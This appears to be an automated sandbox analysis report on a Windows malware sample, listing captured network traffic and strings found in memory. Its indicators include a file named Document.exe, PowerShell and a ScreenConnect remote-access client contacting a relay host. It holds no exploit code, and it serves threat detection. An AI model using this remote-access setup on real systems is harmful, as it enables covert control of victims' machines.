                            Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.41f9102ebf55f037c91d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                            Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.6956f4a50d95807c6fa7.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                            Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=06D62A95A9756E352E0F3F3BA8146FB6; _EDGE_S=F=1&SID=17147361242C6D27257B66CF25CC6C0E; _EDGE_V=1
                            Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741859466654&udc=true&pg.n=FRE&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26firstlaunch%3D1%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1f8069b866824b75ad73b23723be122a&activityId=1f8069b866824b75ad73b23723be122a&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=06D62A95A9756E352E0F3F3BA8146FB6; _EDGE_S=F=1&SID=17147361242C6D27257B66CF25CC6C0E; _EDGE_V=1
                            Source: global trafficHTTP traffic detected: GET /b?rn=1741859466655&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26firstlaunch%3D1%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=06D62A95A9756E352E0F3F3BA8146FB6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                            Source: global trafficHTTP traffic detected: GET /b2?rn=1741859466655&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26firstlaunch%3D1%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=06D62A95A9756E352E0F3F3BA8146FB6&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=171d74c1e7746e89b4b14331741859468; XID=171d74c1e7746e89b4b14331741859468
                            Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741859466654&udc=true&pg.n=FRE&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26firstlaunch%3D1%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=1f8069b866824b75ad73b23723be122a&activityId=1f8069b866824b75ad73b23723be122a&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=98AA23406E4148458C163AC50FE82737&MUID=06D62A95A9756E352E0F3F3BA8146FB6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=06D62A95A9756E352E0F3F3BA8146FB6; _EDGE_S=F=1&SID=17147361242C6D27257B66CF25CC6C0E; _EDGE_V=1; SM=T
                            Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 350sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=9|RefA=1F8069B866824B75AD73B23723BE122A.RefC=2025-03-13T09:50:58Z; USRLOC=; MUID=06D62A95A9756E352E0F3F3BA8146FB6; MUIDB=06D62A95A9756E352E0F3F3BA8146FB6; _EDGE_S=F=1&SID=17147361242C6D27257B66CF25CC6C0E; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=ae7b7f56-dd9c-4c76-ab1c-e65b2d83368f; ai_session=B/K1pq/5FriLaEc5DorYQG|1741859466650|1741859466650; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=9|RefA=1F8069B866824B75AD73B23723BE122A.RefC=2025-03-13T09:50:58Z
                            Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":39,"imageId":"BB1msIAw","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&firstlaunch=1Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=9|RefA=1F8069B866824B75AD73B23723BE122A.RefC=2025-03-13T09:50:58Z; USRLOC=; MUID=06D62A95A9756E352E0F3F3BA8146FB6; MUIDB=06D62A95A9756E352E0F3F3BA8146FB6; _EDGE_S=F=1&SID=17147361242C6D27257B66CF25CC6C0E; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=ae7b7f56-dd9c-4c76-ab1c-e65b2d83368f; ai_session=B/K1pq/5FriLaEc5DorYQG|1741859466650|1741859466650; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=9|RefA=1F8069B866824B75AD73B23723BE122A.RefC=2025-03-13T09:50:58Z
                            Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                            Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                            Source: global trafficDNS traffic detected: DNS query: f005.backblazeb2.com
                            Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
                            Source: global trafficDNS traffic detected: DNS query: instance-pi5ke2-relay.screenconnect.com
                            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                            Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                            Source: global trafficDNS traffic detected: DNS query: www.google.com
                            Source: global trafficDNS traffic detected: DNS query: apis.google.com
                            Source: global trafficDNS traffic detected: DNS query: play.google.com
                            Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
                            Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                            Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                            Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                            Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                            Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                            Source: global trafficDNS traffic detected: DNS query: c.msn.com
                            Source: global trafficDNS traffic detected: DNS query: api.msn.com
                            Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 905sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-www-form-urlencoded;charset=UTF-8sec-ch-ua-mobile: ?0Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIu2yQEIpbbJAQipncoBCJXkygEIlKHLAQiFoM0BSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                            Source: svchost.exe, 00000003.00000002.3037640058.00000216C4202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: powershell.exe, 0000000A.00000002.1377280322.00000238E5D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mk7
                            Source: svchost.exe, 00000003.00000002.3037260629.00000216C32E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2867898626.000001D22A400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: AddInProcess32.exe, 0000000C.00000002.6316208460.000000000127C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                            Source: AddInProcess32.exe, 0000000C.00000002.6317687752.00000000012A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabn0
                            Source: svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                            Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdns:sam
                            Source: svchost.exe, 00000003.00000003.3035259067.00000216C3B10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                            Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
                            Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsddre
                            Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdoft.c
                            Source: svchost.exe, 00000003.00000003.3034624862.00000216C3B53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171042850.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdpSe
                            Source: svchost.exe, 00000003.00000003.1173108728.00000216C3B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                            Source: svchost.exe, 00000004.00000003.1203610847.000001D22A600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                            Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instance-pi5ke2-relay.screenconnect.com:443/
                            Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://instance-pi5ke2-relay.screenconnect.com:443/Jc
                            Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002161000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.00000000021DE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002094000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002004000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002332000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002361000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://instance-pi5ke2-relay.screenconnect.com:443/d
                            Source: svchost.exe, 00000003.00000002.3037909746.00000216C425C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035930367.00000216C425A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                            Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
